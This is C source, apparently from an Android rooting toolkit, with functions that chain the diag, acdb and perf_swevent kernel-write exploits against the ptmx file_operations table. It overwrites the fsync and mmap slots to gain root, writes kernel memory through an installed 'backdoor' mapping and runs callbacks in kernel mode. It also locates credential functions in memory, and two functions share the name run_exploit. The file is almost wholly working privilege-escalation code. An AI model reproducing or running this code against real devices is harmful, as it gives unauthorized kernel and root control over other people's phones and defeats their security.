/*
 * Try the available kernel-write routines, in a fixed order, against one
 * slot of the ptmx file_operations table.
 *
 * The slot address is get_ptmx_fops_address() + 0x38. It is handed first to
 * attempt_diag_exploit(), then to attempt_acdb_exploit(), and finally to
 * perf_swevent_run_exploit(); the sequence stops at the first success.
 *
 * Returns false when the ptmx fops address cannot be resolved, otherwise
 * the result of the first routine that succeeds or of the last one tried.
 *
 * NOTE(review): 0x38 is a hard-coded offset that the original variable name
 * treats as the fsync member; this depends on the kernel's struct layout --
 * confirm per target build.
 */
static bool run_exploit(void)
{
  const unsigned long int fops_base = get_ptmx_fops_address();
  unsigned long int fsync_slot;
  bool succeeded;

  if (fops_base == 0) {
    return false;
  }

  fsync_slot = fops_base + 0x38;

  /* First routine runs without a progress banner. */
  succeeded = attempt_diag_exploit(fsync_slot);

  if (!succeeded) {
    printf("\n");
    printf("Attempt acdb exploit...\n");
    succeeded = attempt_acdb_exploit(fsync_slot, 0);
  }

  if (!succeeded) {
    printf("\n");
    printf("Attempt perf_swevent exploit...\n");
    /*
     * NOTE(review): the (int) cast of a function address only round-trips
     * where a pointer fits in an int -- presumably a 32-bit build; confirm.
     */
    succeeded = perf_swevent_run_exploit(fsync_slot,
                                         (int)&obtain_root_privilege,
                                         run_obtain_root_privilege,
                                         NULL);
  }

  return succeeded;
}
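/*
 * Run load_msmsdcc via the ptmx fops slot at offset 0x38, writing to that
 * slot through the mapping opened by backdoor_open_mmap().
 *
 * Steps visible here: resolve the ptmx fops address, open the backdoor
 * mapping, translate (fops + 0x38) into the mapped view, store load_msmsdcc
 * in the slot, call run_load_msmsdcc(NULL), clear the slot, close the
 * mapping.
 *
 * Returns false when the fops address is unknown, when the mapping cannot
 * be opened, or when the translated address is NULL; otherwise returns the
 * result of run_load_msmsdcc().
 */
static bool run_exploit(void)
{
  void **ptmx_fsync_address;
  unsigned long int ptmx_fops_address;
  bool ret;

  ptmx_fops_address = get_ptmx_fops_address();
  if (!ptmx_fops_address) {
    return false;
  }

  if (!backdoor_open_mmap()) {
    printf("Failed to mmap due to %s.\n", strerror(errno));
    printf("Run 'install_backdoor' first\n");
    return false;
  }

  /*
   * Add the offset in integer arithmetic before casting: arithmetic on a
   * void * is a GNU extension, not standard C.
   */
  ptmx_fsync_address = backdoor_convert_to_mmaped_address((void *)(ptmx_fops_address + 0x38));
  if (!ptmx_fsync_address) {
    /* Do not dereference an untranslated address; release the mapping. */
    backdoor_close_mmap();
    return false;
  }

  *ptmx_fsync_address = load_msmsdcc;

  ret = run_load_msmsdcc(NULL);

  /*
   * NOTE(review): the slot is set to NULL, not to the value it held before
   * the store above. That is only a faithful restore if the slot was NULL
   * to begin with -- confirm against the target kernel's ptmx fops.
   */
  *ptmx_fsync_address = NULL;

  backdoor_close_mmap();
  return ret;
}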
/*
 * Forward a physical-memory mapping request to fops_map_physical_memory()
 * using the ptmx device's file_operations table.
 *
 * map_address, physical_address and size are passed through unchanged,
 * together with PTMX_DEVICE and the FOPS_RUN_BY_EXPLOIT mode constant.
 *
 * Returns false when get_ptmx_fops_address() yields 0, otherwise the
 * helper's result.
 */
bool ptmx_map_memory(unsigned long int map_address, unsigned long int physical_address, unsigned long int size)
{
  const unsigned long int fops_base = get_ptmx_fops_address();

  /* Without a resolved fops table there is nothing to hand to the helper. */
  if (fops_base == 0) {
    return false;
  }

  return fops_map_physical_memory((void *)fops_base,
                                  PTMX_DEVICE,
                                  FOPS_RUN_BY_EXPLOIT,
                                  map_address,
                                  physical_address,
                                  size);
}
/*
 * Forward a callback to fops_run_in_kernel_mode() using the ptmx device's
 * file_operations table.
 *
 * function and user_data are passed through unchanged, together with
 * PTMX_DEVICE and the FOPS_RUN_BY_KERNEL_MEMORY mode constant.
 *
 * Returns false when get_ptmx_fops_address() yields 0, otherwise the
 * helper's result.
 */
bool ptmx_run_in_kernel_mode(bool (*function)(void *), void *user_data)
{
  const unsigned long int fops_base = get_ptmx_fops_address();

  /* Bail out before touching the helper if the table was not located. */
  if (fops_base == 0) {
    return false;
  }

  return fops_run_in_kernel_mode((void *)fops_base,
                                 PTMX_DEVICE,
                                 FOPS_RUN_BY_KERNEL_MEMORY,
                                 function,
                                 user_data);
}
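/*
 * Locate the credential functions by delegating to one of two finder
 * routines, chosen by diag_is_supported().
 *
 * The address passed on is get_ptmx_fops_address() + 0x28.
 *
 * Returns false when the ptmx fops address cannot be resolved, otherwise
 * the result of find_with_diag_exploit() or
 * find_with_perf_swevent_exploit().
 *
 * NOTE(review): 0x28 is a hard-coded offset that the variable name treats
 * as the mmap member of the fops table; confirm against the target
 * kernel's struct layout.
 */
static bool find_creds_functions_in_memory(void)
{
  unsigned long int ptmx_fops_address;
  unsigned long int ptmx_mmap_address;

  /*
   * A failed lookup returns 0. Adding the offset to it unchecked would hand
   * the bogus address 0x28 to the routines below, so stop here instead.
   */
  ptmx_fops_address = get_ptmx_fops_address();
  if (!ptmx_fops_address) {
    return false;
  }

  ptmx_mmap_address = ptmx_fops_address + 0x28;

  if (diag_is_supported()) {
    return find_with_diag_exploit(ptmx_mmap_address);
  }

  return find_with_perf_swevent_exploit(ptmx_mmap_address);
}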